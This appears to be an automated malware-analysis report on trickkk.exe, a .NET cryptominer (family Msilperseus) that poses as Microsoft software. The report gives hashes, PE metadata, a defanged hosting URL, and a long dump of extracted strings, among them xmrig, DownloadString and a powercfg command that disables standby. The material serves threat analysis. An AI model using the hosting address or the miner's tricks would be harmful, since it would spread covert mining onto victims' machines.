MalScore
100/100
MalFamily
Msilperseus

trickkk.exe

Is DLL Packer Anti Debug Anti VM Signed XOR AntiVirus 53/67 Related 2476
File details Download PDF Report
File type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
File size: 526.00 KB (538624 bytes)
Compile time: 2017-09-12 02:12:41
MD5: da92d531fd643d8040b4b89f98ce6b38
SHA1: d035677e15e53feeb112f8c14cf0217ba20da569
SHA256: c1b6c900be03db7570324d970f4a34377ba2c0da8f09313f4fe2e470c202002c
Import hash: f34d5f2d4577ed6d9ceec516c1f5a744
Sections 3 .text .rsrc .reloc
Directories 3 import resource relocation
First submission: 2017-10-23 13:51:03
Last submission: 2017-10-23 13:51:03
Filename detected: - trickkk.exe (1)
URL file hosting
hXXp://45.77.62.98/files/trickkk.exeVirusTotal
Antivirus Report
Report Date Detection Ratio Permalink Update
2017-10-23 10:18:21 [53/67] VirusTotal
PE Sections 2 suspicious
Name VAddress VSize Size MD5 SHA1
.text 0x2000 0x82e34 536576 134d341e88ff7196d74477c235fb176a 5a04eea28a5ef9ef74b417012e33fbe9786440d7
.rsrc 0x86000 0x400 1024 02418dcc311bfcc9733a8fedd89cecd4 b3b4833dfc1fffeeef8ac802c5361345f2e74222
.reloc 0x88000 0xc 512 400ace7be179286228f52bec1fea9ceb 90d3debc4a3cc87feecd1a732b1229d0b095a689
PE Resources
Name Offset Size Language Sublanguage Data
RT_VERSION 0x86058 832 LANG_NEUTRAL SUBLANG_NEUTRAL
  • API Alert
  • Anti Debug
Meta Info
LegalCopyright: Microsoft
Assembly Version: 9.0.2.774
InternalName: trickkk.exe
FileVersion: 9.0.2.774
CompanyName: Microsoft
LegalTrademarks: Microsoft
Comments: Microsoft
ProductName: Microsoft
ProductVersion: 9.0.2.774
FileDescription: Microsoft
Translation: 0x0000 0x04b0
OriginalFilename: trickkk.exe
XOR
8 278266
1 278266
2 278266
4 278266
Signature
This file isn't digitally signed
Packer(s)
Microsoft Visual C# / Basic .NET
Microsoft Visual Studio .NET
.NET executable
Microsoft Visual C# v7.0 / Basic .NET
File found
FIle type: Library
ADVAPI32.dll
WS2_32.DLL
psapi.dll
MSVCRT.dll
mscoree.dll
USER32.dll
USERENV.dll
libgcc_s_dw2-1.dll
IPHLPAPI.DLL
KERNEL32.dll
IP Found
No IP detected
URL(s)
No URL found
Possible connections
1Curl!
Assembly Version
)5-
Security_Center
)8B
VarFileInfo
Copyright (C) 2017 Microsoft
Comments
)77
)75
Copyright (C) 1999-2017 Microsoft
9.0.2.774
)>H
3.5.0
GHI
);F
trickkk, Version=9.0.2.774, Culture=neutral, PublicKeyToken=null
)3*
mwsd.exe
miner
trickkk.exe
5.23.71
)3(
)C^
StringFileInfo
Translation
Microsoft Security Center
911.20.19
)?K
FileVersion
VS_VERSION_INFO
xmrig.exe
InternalName
000004b0
miner64
ProductVersion
)Fb
FileDescription
Microsoft
OriginalFilename
www.microsoft.com
LegalCopyright
____
resource
CompanyName
LegalTrademarks
)Ge
ProductName
)8:
000004B0
)B\
Microsoft Windows Sound Driver
)8=
)61
hE@E^
f._9
+{
"|14
X4Fr.rh.46Aw-wl-6
M/L|
sk"D
BW'p a
ku;tg
4` ]
:3
L(I
_*aaC$
<S<0
<At
#tw01
8!PX
4 Pg`
I+I
2"VaD=
l[S]3
9G_x
a(]'
QWQi
4_R
JD
'nF`
RiZ7qNVVA}p
WaG
IN)=P
j`hbp(
lxIWDA
<7v,F
43no
QWQG
1Curl!
s&&O
I;#@b
+P0r
RIT8
#Z![q
H 'E
`j?J
~D.#
w|hpR
pAed
9e v\
URL c
tL2$
fL!x
d``_;`8'
_-t
&:$*"
~DS=
0X-O|T
V?;A
[C|9/C
K(k0D8
vryo-6
|t!r
LaGD
O^
u^|5T<
S81
$/*M
,E ~
1:$=
c_$p
!Zs a
q>N+
Y="@p
$00cc9dc1-fadf-46d1-918b-b6dee92479d4
<PL^
Nc,e8
4M m
5mz"U{
D&a(
&p%!
tH|Sq
exhidx@
SE!/
ms(C
uuH#V$
W0 a+ ~
5H&
(7n!W
:J<5a
[!I8tl
t\2<
;>u<
S L
NNNNvfVFNNNN6&
<TbW(
"R L
z`^d
EP
Tl?V
sH\4,
((,,d
#F j3
w\Fad
BXHg
+(e
S.i0p_
l` 7
:]nc
.,d#
S)um
)' e
d"
rrrr
HT9!U
r`50.
ADVAPI32.dll
k(lD<DP
`: l
)h
pOz;,P
#J/<LF|
;BP
J vHM
8DGxX
PK}N
l2E.
v.BV
(0kC\ 0
FXns
r@9<z8
K*//
BHP-
/ Tv
"t<)
?hce
Sczn
;S {\
w$pa
<#`T
1177
@("H
"jp]P
NDX+-
^5THC
d$Spd
7/.
= l.p
GSs
6$w
Oj#E
AK[+
nWpOd2$
S 3R
8;\@
*$'
r@/l
@X J
\i y
UA>2
t|$5
)K *
OpenSubKey
> -iE0
KXV4
v q:
D!)SE
R@udH
?w^r*i_
K ST
z7Xh
B[?
1B?#
y.Ok
Na,
1H/sk{
KPSk
D$'Bj
&6!KX
B+VTJ
ame_infode/
1H/skh
p-28D
;`uX
S)=2
-}*j
Y $l
p F8
0TX^
0vF?
F/!-
N[T?
2_shbE
ADN,E
6 j%
~<Ku
] d)P
-E)Ti
HcH<H
AssemblyFileVersionAttribute
~3=sQ>
{p<k
t%mN
&ea3
^Ae]
2<6,
((((
%W2,
~G(p
Ix'yV
[2Z NW
T*NLLV=M
U"[M
zqJx\
.fqk
6s0bu
lRfej
C3 Z
a,\)
@.H@
\.8117
i+ !
[>"DC#
2} v
U 5 X
E)!k
9-\r
; ?D
p\"W-irr
?*!c
O;$$ v
get_ExecutablePath
@N-<
Char
NL~R
Vhv(
@b .Tx
1 <\
;h)9'
w7,9]
F_FX
@ xm
lY\-
mt
l^Yx4
ZE M
Y =%
IPV6
Kx6 m
b# /
9M8Hc
xu{w[u6
d\z!q
<zW&~
KB.dH
ur 9%
5^ d
Hl@&
V \L KLK@ 1
''''
) <
'''#
?aCoc
A4JH2
&y_5_L5&
old1
j-)_d\
'h 8 o
9J9.
aBQKZD
39Zfz
TS4E
e4'S;
x(q9
H|Xl
6,@@
|T05
mIOo
<Q#}
RegistryKey
Fr4FJF
60tO
*^ N
Yb\a
8f#
6%*>M
OKKk
M^cG
[E-Ei9
K 0C
\<[
I V7E<
kW2$
KB:px^
bl4 15
*kcf
}`n{
8Gv@
_&[{
B[%[
M jl4Y
b+"!-
9JLX
)T+$
Wki9
A(((
#~I'\#
Tp8
H&2fc
ATK
D;A$|
\nNB
~h,#
Ryy
H)xW
jJ4^
x N
\t]F
dZ7C
ub&k3
xLt7@N
*Z(J
8AJS
8Vz
V|wo
=THv
`t4
A&7Q
Bu)J
f\Du9
%K_t74
OgZ$
:2Hd
VET
cNs
(^7_J
tr=!
t"z%k
Rp7
vE$'=
4PD B
O.`3
@Bbd
x)L&0
h?m{
0>i(k[tC
w 6L
`O &
>J 1
C8F#r4oz
!fq|r
>\) z
FfT6
X?,q
R | <
9IRi
<)/Eq
IFormatProvider
MOp4;
@8 '
nt`4rn
3^5Z
+ >#
x^T
Oww} <O
?: , yB
iWH)3
;^>
Um<O
CUNGrf `
llZF
TMx8eJ
a{Bpg
pWk=L
TR;>)
z *%
addrM}
Mrj1
: ,tF
+ x#
9!o_j
m ^*
0V"9
rLd0
x[Kf
Seek
3J #
[Dt?
;.w!
80VHl
k\%F%uw
cwZ
HC^4~
a fbh
waK*
=6Y_
hep1
t EX
$gV@#
mmS *
4 PQ<!
C\G]X
UXQ\m#
X+=
3dDw!]
jE#Z\
dnGg
T` =
L-h@
C so
GetProcAddress
Z<<O
r.@7\u
PPPP
8P_1.6
9?<U=
_'p5h#
pY`
.p=j
T~e
HmOo
sD>>>NNNN>>>>
H tA
58S(
yQ|R
VLz
~+A;PIF
m"]5
} VH~
w(J*
}*]=
t)LP
@@@+
XgMLI
ReadAllBytes
r6UG~
$-t-i
8Z^i
f+
n&AE$
'H@i;A |
tAW9
ZX #
"@(g|
Lmlb
z|K>[
505
&8tHn`[+#lXV
:YzC
dW\D13
*!Nb
!D7a
get_Assembly
"L$K
_ 'K
3asa
P(f5.H
(J3M$8
`4S ww]h
CH8&{
A3 (
.bfyNu*6+
v$nEc
}OD@
wK9V
hI]*
|1}lm
O<uQ
W\WZ
E`d\d
d:T:B.
<hpt&/r`UM
*TKV
Vp<^
`( J
yNjh
Yc%?
xJ}{
l+ >
d/v
p8Aj(4
x+nr$
R'UC
_aD)
6BxH:
] e
WC|VV
ABGD
JGZT~
Y1q
}8O{
#K=
ptth
iDnT
'"h^
:# x
ajBjit
HS.G 84
sZ
x+ }
# 8y0
s"~/
qN@I
^D>"
lyy`
bQ{N
m?5B
System.Security
:K N
k,3?
y@n7s:
O8L0
yXF3
E Xl`
$_4X$
n .Y?
NCRTH
o~ :^"
[$b8<1
)f-l
&7 20
E;n?t
7? Bx
NNNn
System
Q03d
Application
v@SN
kuxs)Oac\{`
nWR)FI)KM
/] Z P
s u(
,#1/
9iZ9
f^
54R
FC^7z
F?_D
[OPTIONS]
l}W2!
13t1
-}uj
1xx/
<@p ,
"K] f
Z,t#<
g~(V
XGH%
%1R}
Ga\H(0
HtvA P
#%EY#
rO _0
csjt<
>iLe
4*9l
-}(j
0<J
a<58
ME;l
# \nFa
$G!'
2!<<
AH"L
Yk]{
dJX7
}G1i
;jJF
ojajl
uJT+
i @n
~8ME
q hG
3&047GUHt]F
tamc
"fT**~;
;w%S
5 w >
FHK vj
)S 5
C%qG_
x Hh
pH.~ tt
~S_t
X+ !}
X+ !|
t\|
<8W
.s57
-2cw?`k
HO$UZA
_^;
V%n&
"U<<H
X+ !h
OntD
8p& 5<k
2H&L
*4R!
:D.Lt
tXru
l3k,
P.A8
,&D|
|G8^S
X$ 0
2NHi
/k&L
1^<b
XAq;p
X\|".b
A$ l
: o't
`Vd
qt}@
(Hu
_;-b
BB4H
&QRP
bFKc
zA:I
!5L P
U!&f^
uzM
sH{Wbn!
96"i
8NC
s<ly
OqM)
($Z8
};%D
!9A`
AUATUW
WRu
%%iKZ
Wu4T7H#
D j&
W4GX
>X+ #
L,v115_6cl
aptD
0{<X
Ip W
<L,t
M(<t
,($
`H)B`
Aiv%x
`D<
g' lO
,n[&
m)-
Kt!f
\L}
\` ,
C&teEn
(Htom
=PFu
: hn
4-!MjpHC
Sr}!6
<DW<
+ 7
2ryO
s2FS',
?s]H
?CnFQ
\F Lt|?
"DI"
x64
wDvu
KmoKl
b(|v|
@~@v
aH`A
@<7t /@3V
(iZN `;H
y#Xp
g*?9)"
t Qu
P~{
DFJE
Boolean
M#_Z.
<5&~1
%q1
{<\
^a$4
s3%&r
TeQS
b9T~0
*G1 26)#
Gwh
C$}d8
h.MFVEE"
0 DZ
Av*L>{
]Gh
b &s
W:;D
Z >
/?e
_<Vt@<KtX<Dut
`me(=
eg|{
&g|U
{S !a
#22`d
?wtA
/gjC
^=D"Z
xt1
X vIf
gza8:A
#L <R(7U[
{6IF
p`|EH}
N&nGP
/ )`iff
g9Ut
zt>z
/4.{
iP(v
6nx=4
6]yOr
p/E-
RtQw
$((,,L
KNYv
hfwv`ws`w+`}`'%'
JobO
VP>fd
Byte
SNS8
R:|E=e
'HLE
ZXr(
Y,P9:
~,X
IU.PbXj
3;vq
b E
l]p8
l<'9
6Vtp91
a`iP
ELXW]7
wSX+
K2iNpi
yHmM
;Z$%
]([&
TOBB
,09s
get_Count
D<8`
= mZ <h
TZFx
sQ_0
}tDD
&'d? <
Format
G{1~r+
CHEf1
`]{3
`ql.h
'` b
5 SI,_j
nM<o<
l).9
NP8oH
(4>]
@0zv
e]ME4
6uy
Z[-A n
hD
O<.I
ReliabilityContractAttribute
\A'w_
k hf8
t5Hl
Uvkg{g
ToInt32
SY?X
TF(T
Zd.y[
)t &
i]IBg
qJ U
4duG
1__`
Vg_B
bGz4/
rrrrvfVF
XN&k
<A<v
l& $G
xx<D
.y+t
DuT Bi07
AssemblyCompanyAttribute
g0 _@a7
OTAK
rxYK
=$d"e
E8x
i:Er%
Bc.O
5'aH
B?lIwy
#iR%
ShowWindow
M2M5
tldFFFF\TLD
i/EC
8 Q_
A' ^
zvNb
?u '"
b3p8 vX^
P<k`\
l+V
5d!d
+yz
K R'p%
B V,H
LAPP')
^^H U
U8h&
h`D$K,AL$
E|e)
u[op
,.:.
e 22
h ^.
y4pj
VJA Y
?PEl
R)IK
bu
O0p R
Ft,`$W!
^&d,\_,
"E f
X+ @7
h
)\%{
WgE \Y1
i+^
LBhX_
;#MT6
WtE H
set_FileName
kGk7d
zBw)
.K?JG
zs*Bn
J1yd
Pb]bpoh
$EM
GetFolderPath
'qIg.
?a?U/
_L+T
b>V5S
6]]z
2a1ZP
# /t
,_e\!
}Yh
0hYO
X+t S
Lp 'rI&
TZ0PR
S\ 4
N82L
,u&]
@gHp
]spNekm
N~Rm*
h,:
CPU~
){0u
u- s
6SoS
LayI
@<fHZ
w =1
''''vfV>''''.
_84d
ZH$<]?L
)yAg
9F,=
B)=/
IwG]
{! }
u>Du)n
04"5
[ r 8
95S@
J/JdBf
/wNI
6XfR4
K S~#,U
fr 8:!
P}p{
AW j
~ Y@
gY
.qPj
v|})
6d_@
Dl)
si!0
V>: Z
Z^_x
''#O
488M
<Bg|
}ws
HkR_
~8a*l(
).~y
}H f
38? xh
p <
~&$\
0PHR
a+ #
#M $
(Gm`
> SJ
w'}h
g49J$~
( 0Da
1hk!,@
2: I
tC <L
J!\
<3b
R:uk)u+
,
o+8 SD
, V
r 0 ` p
+ !Z_
PPw
}2O!,
88D46
D6,/
|5(?l
;2tZL3
_Yp%)S
Uv'St[
|BA|_ARGUMT%!*
Hc^ 2%
XMTp
%:V5{pa5tvvz`{af5:xtmebtrp/`{y|x|apq$twc
_%n>
h9)g`i
8@Hd
b <hV():
H SF
_810HLw
U3}q
-} j
7!
ZNJS
vnX6
GC98
0,E7'
Directory
9^^j
\r]F
vA/+3
?p2e
jobW
R:*
-gbg
A)\PO
4tXdt\
Du[.L
9F X
F`=e!
A.C
rfds
Yyfrg
;9SP^BDXNII^UODNH^IGXtuoitw;Kzu~wG_~hpotk9;4m;Hxi~~uHzm~Orv~Tno;4o;I^\DHA;4
Ho~ga
~5<}
+ a
+. M
h$(l,\F
? A`
C$@D
rZ [
ld\T`
7 wNh GCC
tEgF(
x<<D%
UInt16
P #q
| }5
s2V^
R2*
ek2qj+
YJL$
sxmEY
t33l
U~0 y
`0lH
kgyA
Lb-
4d?!
z0)<
t;Yf
`Ts"
sU&.
D""fT**
c HP
G!G
wT/P-
7 )jT
o+S!
U-"tD
P$,n
F`Stb!
f}y^s!`4Dx
3X+
KC'v
II\fO
?=hMK@G
zSsA
6<NL
+'1
P=aE=
5 '
,4_i
3Ex+5u0
l?>+
O,^W
tv y
w<Xz
i~ A
mXuNh
=,= /X`
`}C|=
3S].
}v`9
CP3 %8W
a+B(
XCU;
] A@
g 0XMD
%Id)`K
JxHk{5
0]/|("
(sjgc
GG p
o_v}
"B55
lTpvX
m&6 (V
Hb=t
c<fD
<S? Re
H >lu
oA=[
S7uO
M68
en c
0hp##(K
au*O
(.e_
]G C
P k8
ZZX_
@i+
~Q [-6
R9SD
#Blob
[^~A
OT0
&-L4
\$3r.}
sspNe
d U)
J)dW
}"" 0s P5{M
ThF3
\ arMf
)\LoW
GR%t
Y 264e4
*D(p
Qh%?
x UJ
+KN&i
$cU\
`i<M
E;V&
1-Ng
0LRpLx
W& j
$eg4
_ lW
_/q9
M{IY
+w Y
i$Z%(|
L 7N8]
B7 pn
i(Op
tRw ?
V<hR
X+D
Kx ;
"eY02q@
wMj<h
\ .l
:tgos|tIZW
Cy|xJ
+w u
-D `)
8 $.
yt
uWtGL M
34_ w,
$F^,
@p@-
)O-M
YHD
P 04
Zti
Hru0f0n4
x#4
5+:M
wkXK/
UDPc{
7uqx
V{/
f'(F
g1_w
~(
; <V
sl8R*C
5$ 1X
{ f;U
S)U^_x
Empty
uF /kz
ptpt
sPmL
B* mv
OVi#
<I`W
x _9
^X_3
%&
MO%Q
:7_;
u| pV x#e
tr0ch
^`c/
$Wc(e5
?J+t
p*DG`
lXzX
%=z8
sPm8
JxtX`
]MLMM
x.9n
6p FL
d#n
W0TK
:O{<
%'[e
1I0
<X
Cu{@
Close
kU5
3y @z
`!Z
e'ew
(ZX3
.Mj*
B'.%|h
l(M)M
X= x
m\KOZKaLDKMZ
r\8T
A ..
#"GQ
S@8)
kRbx
:H^n
Go,r
-}qj
}{Yh_
p/] </x
,OuE
!X\<
[W<L
drge8
4h8n
:'^E+!\
wXtF
,p^J,
l7 F
RL 8
ga`Au
Lusubm
^k//PS7"2;5SzP
rlC J,
\0TH
0V\
@_BDa
UR%H}
KFL<
S .t,
Jh$m
V(k,A
0nxcNp
+ P
4s.K2
I~N?
]03H
Trlt
F`S(
B)
&8T4
mscorlib
vw^[MKU}
;C }
C]]C
|`0+
tz|j
l@[?,
\F.D
XBJ`H'=(
%~%
%sX\x*[
|wdBa_
tt4
]! 8=m6
SGu5
bYZ.
ty;*W
+I4d
brL u
vv?L#
pI@I
, y~Hk
n{D]|
A.yH
u" 8
Guid
bOgW
#k&
43h-9t
ManagementBaseObject
+$kA;
;<a`
G >M8:$0[H
i_mX1
5$_g
<@G8
IAX@m
CT=
_2 &
hz"6
?S H$.@
bHes Kp
kcEA<
b0`
e_ P
5~L@
)m&0^
rIk
19"
hcke
UInt64
tFG
RawSecurityDescriptor
OP;F
]vM)
E@bC
_?Z-
K$fP
:_<:
a*`B
{OtU
iN?$
_!{U(
_ Ehf
V^~=
|pg!p
RK +
lH_/
@r"4a
5j
ot(P#
<_t-=
1MDq
{;u4
qD{8W
>N< DtO
t Fs
/O0c
> 8 2Y
L>9eIJ
=<8T
&[3q"
\LS;^
agIl
y3\T
+$^#
QP(~
4:08
8|tum+tcp
p< t5v
C Acqui
W!E Y
=OVN
*ds"/
(Q}A
sU S
t>"
2vH{
* |J
# SI
=+n0b<XU
RS4&
-}~j
hp7j7r%
V~Sp
1R$5
h [_
3pbr8
\5/ U
0A@A
-yn'
2'42k
;('%
`:|x
!This program cannot be run in DOS mode. $
Y} P
ToAC
o<M)
fu)r.
$|'E:
#t
Ex&28
SXCp
"|p?_
<VP
0DXp
\qO@
-@p
&|RD
l? ]
4 FH
Z*vx
T!0F
1vq$
`mJs#>r
w`;Y
Cb"o
47:a1
\a5:8;5
@.{c]
b$.6
A8Ut^I
3SxMs '0
(ToD5\
ct$'&
IGHUP zceived, eO
Tfmv
Bv(I
fAl}
26C1 2622
a %
s9Fd
xt[6:
d( QHD
P>8<
<xUW
s{=
A"-$
q<x.;`
jW)<
Aa@!
KTl
'A,H
oPPPP
Fr$h
p.z,
V',f
: xa.
.jo?QC
(Bt>
op_Inequality
@vlS
Ks(
A;D`
0t__
S1SRW
ZE e
h4K0=
uz,\
@BXM`a8
+@8m
*k@&
9l:i
=}-?
j.((
7v.1 bu
K0uvX(
gHt
,CG
vA K
S:X
Lwhq
>F>"Pm
%aR.
R'_R
Th5g$
!_pmp
:P\l
\7 z
['/|K
DD,8
\/9Z!
@`IGR
2Ykp[
d%^!1}Z
>bQk_
+ !?
P_/ 8Ap^
I {Wq
+ !F
U3UD3"
&?p
\ ,4
<:kP
EditorBrowsableState
FG6A
i~;H
xn.S
3Hqg
PO02
M>{>
x,`p
QkK
&y2
ZX v
N@Zh
GetBinaryForm
+bEP7
s1drxu
eC!: L
EAC
c]#]
Ma;X
XhB
5Q6y
]U]~
=>|\
L8o
$_jct| `@N
U6G%
z KZ,t
/!c
\dh`
O$"y
SlBh
>=EN
iX
________
JPAF^E
(]
D =-
`VXA
`_h_\tT
u(%0
d"00
>"O[}4
k,}d@$
% D|
c/c;X[
sD vl
h gSzD
F 7x
:*H:u
4-$/
%[Xx%cL
>,^3g
X&8
6DD 2C
e71r
6ro(
U ,2
@MOfq
j E/!
A6+Uh
)u2;
@o\C
tb ,
R]x o
)
0z !,
tLL?
0s
.xo1
2R{R/bl
uOLG
,(I6
F222
"##\L`qFF
am\c
QQXr
^< s
kA:e
_&N
()=Ch
><6t
VK
xMB=m&
a ;8
trickkk
Y
Win32_BaseBoard
6%g%
F/D&
Maou=
tR"Y9
c>!i
ou `n
Z9\
7 kwL
[^_]
t&S[@@[
'Mxm
+`
7FlD
8<
F&S4
Ds%\
eZX3
lx#e
3qW.
5TiCY&#k
_'@`
u~J
#%+{ }#
s2FS',|_g
%^I`0
\kLV;k
_Y:pX
rdZm
`[0W
(5P<
=D'=2
. h*gi
_bXPb!W
}r2#P
cD) I<
Z_i8
~[WZx
04 q=
.%LcS
R6}J
naC^RTBB^C:{
Concat
(tPg
K`Z
`Qbt8ln
! 6"
2.V+,U
o8}8M
rN6+
x"S>
7m: <a
Bi/g
d-%02 :]~t
WebClient
&&\q
0>Ar^
ZY[_
V {I
K@uA
vH>N
&Qct^/
UD3"
Tv&8
]\D<
?~y
99y
B&
JTXv
@*q
mfbLL
AWAV
<D]D
ee}I.@
{fu:
2HM*\Ps
.text
@GFGFJ
LT=7
!:J@jT
u08Z
$X+ ~
XH a
System.Text
*AjN
:.6>;'\u%04
_Dt:T:o:u:O:v:Vb:
) Gb
So<h^
^`Bd
82{=
WLVd+
oIO'
jp()
I4GH
@M,
d=}]
WJ$i
q| QD
aLA xw
+".h
@\DH
N?Go
pxhhO,d
;KXm
nY8
v /hz
(09UX
AGwk
GetObject
up%XG
N)z ?
_ s~
\+8 }
\Y7[2
FK&P)8
EGvL
t=0, Z
q ]5
RawAcl
}rx{
Q''/
+pD`
AD>#
+x~+DI
^)t+
oDL+
>=Y<p
p8j
T`00P
q'*%
I,@Y/+
m'F`
GYmH
!![J
!66H'
'7:C<
>-
_CorExeMain
m (R
R&N$,
a2!,
h4f7.
*KTY
w1d3
4Cu\
<;93
T zK?"Q
' cVV
{nu43
SNHV
8P<07
Q":@
,JN
WHBH
7qh@`
YnKMFA
-Ps
w$WOm
`m5a
G O9SHU
i O9
_iob
D X'
0:MS
|efo
QUADG
%4G_
`+H$
K7EL
26C1
XXtDy
0/*g
Rp;
{> a?N(G0
\[XE c
".K
yS@OT
ME{i
%bZ8
~Ct_
X++
ibFGB53
atoi
8 b~
HR~@
awk$
Z[pD
pnA[
JQ R }uC
0,($'
tdTDa
EzX+
Rp"l l9A=<XO
;Pa;
OO[
get_FullName
(NSC
vX?HL|d
.,Rb
hTF
sV=%0X H p"m
8C &
:&\R
b{5rY
0"S(
jvV
f mI#F"|
qHH2I
Dx-D(
(aEcu&
UCyL
FVh UX7Y4t
TIJ,0h
X+X
<?xml version="1.0" encoding="UTF-8" standalone="yes"?> <assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"> <trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"> <security> <requestedPrivileges> <requestedExecutionLevel level="asInvoker"/> </requestedPrivileges> </security> </trustInfo> <compatibility xmlns="urn:schemas-microsoft-com:compatibility.v1"> <application> <!--The ID below indicates application support for Windows Vista --> <supportedOS Id="{f93c153f-5069-4d6e-a655-02f5c1875897}"/> <!--The ID below indicates application support for Windows 7 --> <supportedOS Id="{f00c7727-8dcb-4e2d-b339-341e2c0a3ece}"/> <!--The ID below indicates application support for Windows 8 --> <supportedOS Id="{cb181a37-9e85-4060-b55a-bc0d7010efb1}"/> <!--The ID below indicates application support for Windows 8.1 --> <supportedOS Id="{64019d39-6999-43f2-bcfc-35240f7ce523}"/> <!--The ID below indicates application support for Windows 10 --> <supportedOS Id="{34062d27-3631-4802-baec-511c0e7748ba}"/> </application> </compatibility> </assembly>
,u b
l+<"s
DLN.
;aH
vkigjnBpqU
~n^rrrrF6
4B00
`\La
EBs+ Ow
5&B(
lvki
*X__v`
UI^>
>)
0mFw
/`%C
)Xj0L
0' n
M{u
RE FOU!(
KQ &
` SoC-
qprl
ZtWCZ|
;Y s
2XG#`
dT5t*
WqPl
!)#q
e4ux
F#\mF7rbE
]d1pI
kl-`H
PPTQ<
]<3s/Y
Bfh?
=d &$
pxA_1
il$
l(L,
)?Y
4tk
GcI,B
=0ht
)5T0
z==G
Wtj<
6P9
I[)'
oj0R
K<PM
sy^\<4,` 0m
FYOMs
r| 4
_f C
0_4
8TuO
'/Wp=
hJ&Y
X+3~
}&@
ToE8t\
=$pL[ "
Bl|9/[:
.D_?- p
8o`8
iWQWQWhh
f@;2
((}Q
$nAb
/,0'
`
A;V,} k
CS)
*00m)
+n]r
%u`X;X0
d#1[
Z`}{l/,
33113|
$>>
< BTP
CuXR
kRf
$Xkt
?+uXm
"&tx
Stream
{SXJm va
0 (r {
v p !!
t7d/TD
=J&B0,
M{jy
4SYP
oK,u
t f^
-VP]G
8p>e0
~s?
J3hhll
_^3B
&/(>
TF#
flows@V
Dx.!
'^0b
C0 ,
<,|'
8\EO
h8di
/.[P
7iI GDv
NNN$%&
N^ee
| TuWc
H"~`
'dB
><IaWlH
A&*)
W&X;
>r HXM
t.Atg
C*5"
JFcH-
GetCurrent
uR'x
J,}@
~?t2
nPiv
"Aw-
i6au
Bp>!>
FY`
V A)
F^d
GetKernelObjectSecurity
kpI&
t[`og
tE *
k[]L
JM%p%h
VXR
7OP-
X+ ~
:C,V=
Xh A
qo@L
*B9999Tr
4 m3
=tf.
B&9Bu
)fh"4
:3,8l
.OP'
uO+U
l>Ht
P9<
@d#-
~SK L
C8!]
#
DzZJu
@>4t
x6i;x
3,^|'
8M M
0>~_m
ra!4+\99
i4HP | HT
+*Zp
pAvl
0A
MRybD
P#uy6>
=7bW
KQek!
Eby!KS*
nA(oC
Kyc9
oJU&VF
PDAL
7(LBH
[ l0
HXqP
Bk|H
#}N^
%}?O
N]rrr
Ld"6
1BH"
Lc7& 4`
# HHuRk
UGi.
" ~5|
A|~5gX
{_7b/cW
z4o
uL<`Ht
H6R<
9u<@
X+@~0
:FDAZ
+S@g
pFF
5tNj
_ W#
<CW#UH
ExitProcess
)kc;-
jJ{'
)1,k)
:o<:Hv
J=WE
}i&YnO
Ec8D
ckdu
M $,
X X
& UV_HANDLE_CLO
36Vl6
*bE0
hfdWKF{X,
s)s;
}S]@
z/ }1
] %-8
*Z"0
B$J
Jumb
RP>)V
=LLlp
-}6j
L#'Q&
K|8w
(PQ;Q
iikI!
Z--w
Gk`&=
E@z`)
Y)fK)!;0
ude{Z
/gd0o
7# I_
`*x#
_O\"
A^A_
r<e8y
>$M4z
_Xa
zB j
DmOw
^;P$
k9tS
aXH(
pyzE8i
bpwEX
QwY#
B(f_
8go"
4f'}
7oCiZ
\\c(99
C3!q"
w n
pCc$nDr8
@7k
&H(k
3AaA
KXGB
/#,]
Mod:
p%,&3
3Rf!
t4Nw
kp}Y C
00l4
X&dT
~F=8@to=
8#M=
% K im
S]8{0
^ AX
` 1[`9
h0<c2
Qb-@*P
M@AG
jaBF4
PRFOCO
*wuh
!zK\
O*`j0
ery"
*AvuJ
UrXH
>pG
n< :
FjWG
BkC
:9Pqm
Rise
, ,
Z# ]
PD}w
-+]"m
OIb}
GenericAce
Gp3
pm!)
CULF[
d G
a?S(
s M+
v4
1c5h
Sa7-
?}<D&v
B)u`D
'LXA
<OVRP
QR^b
'
ResourceManager
____________________
qptb
V'se
-BJ0
"P/c
A .Op
H| Y#
0pYp^
n*lw
3s|
FaS] J`
U :$
8LNS_YDL
/tb;:P
otsw% W
Q@=u
LTpNP
GenericSecurityDescriptor
,l/u}
?07)qB
XCcl
)) `]
SPC Y
@(rc
H @w
[XF(
u- v
Oza"
+tJtZ
.rQP
^ !
`*0L
|o{y
XwcH
^:t`
_bLHM
tlGetV!3}r
IDisposable
2 %\1
-& :9
<;1:"&u
ZIxj
/+m\)
XAMu
Ft~W
ONNN
BbCZppj}
I5P
mdk~x3
rSbD
#hyDo
@@gd
^LDv
De]}
Vs->/
V'cP
hO9`
EdF
4RH2^R
6yX+ ~
sQ
dG&X<?I+6
DownloadString
i4:B
hEZE
qL
qr s F
Z`_.
s Dbu]
lw&lm
>4X ;j
3 P)
{hH-
/Dn9
^it8
.N>6
"O@P
d+tA
5{q
^\A >
(`8%
&Y_uFi
4rDG
19~ /228r
P 6C
,< k
AscV
bX_
Dl3xz?
Z` /
/C powercfg /x /standby-timeout-ac 0
P((x
Zc.O
S h`b
IsInRole
_&<F
:xl;Tr\
Tdh]
%53fodd551 312
#GUID
M%8`K
_@0?#P
b+P(
]| sIt
-)z\/
,1P&
jJPt
!?i%
u EM?
DGIQ_
/>7d
v3B6A
@-S@_H@I
BCB+H
,DnJ:
2~W
| 8C
20 OXw b
<1-`[
yGD
KX I
0eZ;
R{iM(
(AXZY
fRtB'
WpRtD@[jb
*P;K
y\)yL
<ourcJ
2P'D8T
4w1?
0 `
e~z
'.=5
9' A
"hIY
nBO|
S$Q
hCxW
bP3?h
p88H
xHOD
9#^A
I2C6
t6QtI
w="]
{M ]
`OHd
K.xN$
i^~Uw
UKey
,S<Cu
|Za57{,cHPqG
Oji"l
>wcT
uN$c(
I+E0I
f(7
b_Z3
/~09
a4hl
4qv'
MPM
jc67e@
% 1_
get_Size
wPa+
x><[0
C 8
t!Hc
c/#J
B4h`
gD8
oddH
{kIx
G*#t
Replace
~x -=@
lp'&
r[Ug
dm1Hh
( U&
x}\.
.<
n<WZ
p4JfX`
@M<XL
I/aTI|
l> w/!
m1Pb8
Xk]>
M_PM
g$s-*
m!TD
}"rP
(Xj f
?wj`
B`2x
5@L
*>4,@u
<n;}
# N
U9w:
7No f
jolQx
>=@2
M`fm
J '}
TFf:
ht-L !
msL^
<G -s!=
FDX_ZD/
|m&OI%D
C)wR+
9u f2
HB m<
i.r.
otLe
7Mq
?MGX
c@.E5
_W;60h
G@N6
`Ntu
% &ug
:c|y
cK
$?8y
